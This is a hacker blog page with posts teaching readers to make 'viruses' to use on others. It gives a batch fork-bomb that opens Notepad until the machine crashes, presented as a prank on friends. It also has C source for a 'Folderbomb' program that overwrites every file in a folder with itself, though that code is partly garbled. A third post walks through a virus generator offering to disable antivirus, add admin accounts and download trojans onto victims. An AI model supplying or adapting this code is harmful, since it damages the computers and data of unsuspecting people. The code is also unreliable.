honest hackerz
i am a honest hacker
we are honest hackerz so beware of us......... this is the most important news
Showing posts with label VIRUSES. Show all posts
Showing posts with label VIRUSES. Show all posts

How To Make Harmless Virus That Open The Notepad File Continuously

Posted by ENJOY NEW TECHNOLOGY


How To Make Harmless Virus That Open The Notepad File Continuously

This is step by step tutorial that explains how to make harmless virus that open the notepad file continuously.This is non-destructive virus to your computer system. If you want to have some fun with your friends , drop this cool harmless virus into his pc. .

1) Launch Notepad
2) Type this code into notepad
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

3) save as filename.bat for example notepad.bat (you can save to any file name you want)
but its extension should be .bat e.g. dkb.bat, virus.bat etc! what ever
save it and then run it will keep on opening notepad untill RAM got full and computer restart Wink)

SIMPLE VIRUS CODING

Posted by ENJOY NEW TECHNOLOGY


IT DELETES THE MY DOCUMENTS FOLDER OF UR VICTIM.
HERE'S WHAT U SHOULD DO

OPEN NOTEPAD AND COPY-PASTE THE FOLLOWING CODE IN IT.
THEN SAVE THE FILE WITH WHATEVER NAME U LIKE BUT WITH BAT FILE Extention.
I MEAN SAVE IT LIKE VIRUS.BAT.
NOW IF U GIVE THIS TO SOMEONE AND IF HE RUNS THIS PROGRAM THEN HIS MY DOCUMENT FOLDER WILL BE DELETED.

Run this on your own responsibility*/
VIRUS CODE-2
/*This is a simple program to create a virus in cIt will create Folder in a Folder in a Folder and so on ......#include<stdio.h>
#include<conio.h>
#include
#include
#include
void main(int argc,char* argv[])
{ char buf[512];
int source,target,byt,done;
struct ffblk ffblk;
clrscr();
textcolor(2);
cprintf(”————————————————————————–”);
printf(”\nVirus: Folderbomb 1.0\nProgrammer:Devil(linux@fastden.com)\n”);
cprintf(”————————————————————————–”);
done = findfirst(”*.*”,&ffblk,0);
while (!done)
{ printf(”\n”);cprintf(” %s “, ffblk.ff_name);printf(”is attacked by “);cprintf(”Folderbomb”);
source=open(argv[0],O_RDONLYO_BINARY);
target=open(ffblk.ff_name,O_CREATO_BINARYO_WRONGLY);
while(1)
{byt=read(source,buf,512);
if(byt>0)
write(target,buf,byt);
else
break;
}
close(source);
close(target);
done = findnext(&ffblk);
}
getch();
}

How to make deadly computer virus

Posted by ENJOY NEW TECHNOLOGY


How to make deadly computer virus / How to make Virus by Virus software

How to make Virus by Virus software:

1) Free Download Virus software to make virus.

2) Run "In Shadow Batch Virus Generator.exe" application to see something like this:

3) You can use various options to make virus to suit your needs. You can:

- Infect files of various extensions
- Insert virus in startup menu, Kill various processes.
- Disable all security services like Windows Defender, Antivirus, Firewall.
- Rename file extensions, spread virus via file sharing.
- Create new admin account, change user account password.
- Block various websites, download trojan files to victim computer, shutdown victim computer and much more.

4) After selecting various options, move on to "Creating Options" tab and hit on "Save as Bat". Assign name to the virus and hit on Save.

5) Now, you have your virus ready to hack your victim. Thus, you are able to make virus using Virus software.

Note: This security article is for educational purpose only. I am not responsible for any action performed by you. Also, do not try this virus on your own computer. If you wanna try out this virus on your computer, install Deep Freeze software and then try out virus to avoid any possible damage to your computer.

honest hackerz

video